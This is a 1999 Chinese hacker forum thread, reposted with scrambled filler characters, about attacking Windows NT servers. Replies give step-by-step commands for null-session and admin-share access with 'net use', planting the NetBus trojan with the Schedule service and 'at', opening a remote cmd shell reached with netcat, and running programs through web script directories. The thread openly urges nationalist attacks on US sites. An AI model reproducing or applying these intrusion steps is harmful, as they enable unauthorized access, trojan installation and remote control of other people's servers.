《版主页黑客工具和文章的几个问题》中提到:0 _1 a) U9 E! r$ k+ e- `/ C
请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。 S/ ?1 c2 }: N! u4 a& e/ E
> 我的机子MMX166,WIN98,2。5G,32M内存。3 w8 `/ D$ m- }* w4 N: O |
$ ]$ i- ?* R5 n4 d- @& s
黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。
2 `( O8 y9 l, n6 h! h! E你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。, v X( s; e* t5 M9 { P
其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:5 d* R) c1 K$ W( H9 h$ B9 j
net use \\111.111.111.111\ipc$ "" /user:""
* h; x7 c0 C( I0 ynet.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:* H( e, n- m6 N; [
net view \\111.111.111.111( o% _' {* ?3 ], W9 h5 D
当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:. F# F, ^# O+ A4 T7 I4 ^! I
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"$ C" \# ?# [9 b8 r7 E5 X
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
# \) X Z0 G- y! k4 {# H1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:# h3 H3 P7 [6 _! S5 d Q) O
net use x: \\111.111.111.111\c$9 j. u1 ^ F1 b* }) ~5 @
net use y: \\111.111.111.111\d$1 q3 o/ Y4 ?- K- F [
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
3 Z- W- q$ H" f7 m2、管理目标NT的用户:6 `4 q' u+ B! O, z/ s/ c0 `; M: M5 T
从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”
* \7 f' h! {0 y( r4 m( [1 y键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样7 o. a3 J+ e- c& T( t* N
3、管理目标NT的服务) R# U- j7 c) M% o
选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”3 `7 y% p) v7 x. r/ ]" @0 J" f' o
这样你可以管理目标NT上的服务,共享目录
4 o# G! v4 o& L% |0 Y$ W4、IIS管理
# L" J+ t o& _8 C7 Q1 V. v选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.1113 G4 t4 z1 L$ S0 L
目标NT的FTP、WWW服务你就可以重新配置( j8 O( K- I$ r( D0 U1 ^# n
5、事件管理) I! I" v( n% z/ V% v5 }' \; {0 \
“事件查看器”->连接到服务器->111.111.111.111
. E* H7 R* M- P, T. M, K5 P; m' x0 O+ ` n
还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。1 M W0 g# [0 l. l/ b
) N2 H. n. j" Y当然,98,95也能做一些事情,但很麻烦,比如:# F1 a }0 ?5 f6 s/ x% K, l
net use \\111.111.111.111\ipc$4 H9 V' P4 L) F. D3 X
net use z: \\111.111.111.111\d$! m U' d* H5 p$ f
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
- I: b2 x1 f2 w4 Y7 \- f/ W! O5 _
我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!, Z, m3 e# \' _2 q d( Q
这样,你还可以了解目标机器上能有什么东东供你去用!
0 q' V: G( N+ j) q, ^0 x- w) t$ U0 [ R8 f1 \, @ |4 z
( O# h- b. G' a3 Y; w
--------------------------------------------------------------------------------
0 r8 ]% i- k, f/ j* [$ e8 P! e6 m( G; z+ j2 J% q
>quack于1999-06-12,23:37:44
) j5 x; M4 \: J1 e# E在大作《几个有关黑的问题》中提到:
* m' ?6 N( R6 O. `. H0 K4 c% J首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。9 `5 C# n( ^* p& p8 Y2 ?
& ~4 e! ~3 N3 x% ~, v v* p6 H
killusa于1999-06-13,03:25:158 |9 E V/ C7 U, v" L4 b# |
在大作《Re: 几个有关黑的问题》中提到:
4 d2 d5 a9 ?; G# @( K* Z7 G4 J* F) {3 n
letmein.exe 暂时没有mypwd参数,十分抱歉
2 W$ V% r7 d) a- q5 `3 G$ y# H% ~pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。0 u* m- t- B. w
) I- J# y* I P" SNetbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的" e& ^ S8 _7 o
服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:4 ]0 [% M5 f) B* @
! I7 r6 T% u6 v1 K& t! r" l! L8 H0 F3 v
1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:4 S% y8 }- z4 B
6 o7 \7 L8 g4 Z& u2 u( X! j$ G
C:\>net start schedule# S' o# U( J% x- {: n3 m2 F
Schedule 正在启动服务.....
( h" W j# g- @* |% \8 HSchedulw 服务启动成功。8 z% u/ R1 b+ A+ J& ?6 o. u0 s
C:\>at /?
$ O6 p/ V) Y/ {7 d0 o3 _' W9 VAT 命令排定在特定的日期和时间运行某些命令和程序。1 A% O3 ^- h) B/ y5 l
运行 AT 命令之前必须先启动 Schedule 服务。! w. F/ u0 h7 }$ \, G) F( d
! l* z1 r* X0 E, F+ y# oAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]+ Q: y* t1 Y/ U- ^* H
AT [\\computername] time [/INTERACTIVE]
2 t6 q9 h$ d; u9 P" w2 m0 ?[ /EVERY:date[,...] | /NEXT:date[,...]] "command"$ `( j. t8 P* K
! v4 R, k8 z0 t6 R3 h8 n\\computername 指定远程计算机。 如果省略这个参数
% }6 Z) n) c4 ?! R, \* c命令会被排定在本机上运行。' V$ x8 S9 n- s' i8 I
id 指定给排定进度命令的识别号。0 R! k9 ?) n$ b; B1 ]1 X, h
1 b1 i# N' `( Z" K7 c; T
/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。/ a* a6 z9 g8 {7 G" Y
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
- t) i7 O k5 p- t% p9 Rtime 指定命令运行的时间。2 O# B- c. b1 C4 |& ]) ^. t" d
/interactive 允许作业在运行时,与用户通过桌面交互。
" O( |8 C7 @" @ l4 A. U% S- O* \' k" J+ l& F
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。! {5 O+ M! n" x) b
如果省略日期,则默认为在每月的本日运行。
3 l: U @; Y- J; Z3 t2 N* N' n2 }; ?, @* `/ d3 y6 M# Q
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。+ X8 P8 J9 d& G) e1 e
# d2 i* l. i4 G! a0 A- C
"command" 准备运行的 Windows NT 命令或批处理文件。! z# o; g6 b# e. W1 c, I/ H ]7 U- S
; l! t, [5 {0 D* hC:\>
- R5 E% S! `6 ]6 `+ B% A+ X6 l0 J
知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:$ L/ [( e; Y R
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
( u9 d( {( c9 C! {- z. d5 q2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
6 s+ a& ], f% `( e4 Z& ^( y3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:; I3 m; {# r5 g: M. N
at \\x.x.x.x 00:00 ntsrv.exe /port:64321; g" l) H) X$ F( Y2 S5 ^+ ?
其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:5 ~5 q3 U4 \" D
Microsoft(R) Windows NT(TM)
6 r% `* B* n( C1 O! Z9 I, I, T$ ](C) Copyright 1985-1996 Microsoft Corp." @' m! W- V2 X$ t
C:\>
5 x7 y/ G' _: @8 [6 S- X$ ^! Z4 N, {" A2 W: |- D7 h, f, S
2、利用web启动ntsrv.exe或其他程序在目的服务器& u# I& }: T; h/ c* `0 f7 u
' x9 z+ o1 h1 B# \9 y* \
将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
7 s9 r) ]$ h! C: S& T6 d) Nhttp://x.x.x.x/scripts/ntsrv.exe /port:64321) ~# R' ~0 `6 N: }! x# c
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321$ a$ ~2 T" G8 m& t3 ~
该程序就启动了" i# P) q; }- B7 Y% F$ d! o
" m5 n" S$ q6 P9 ?我只提这几中方法!% {; |" N7 H0 K) k/ w
要成功,必须打好基础工,对操作系统充分了解!
, R5 w6 f% d4 }3 u8 {* M4 J+ Q% I. s: ?
|
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-13 17:03:28
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡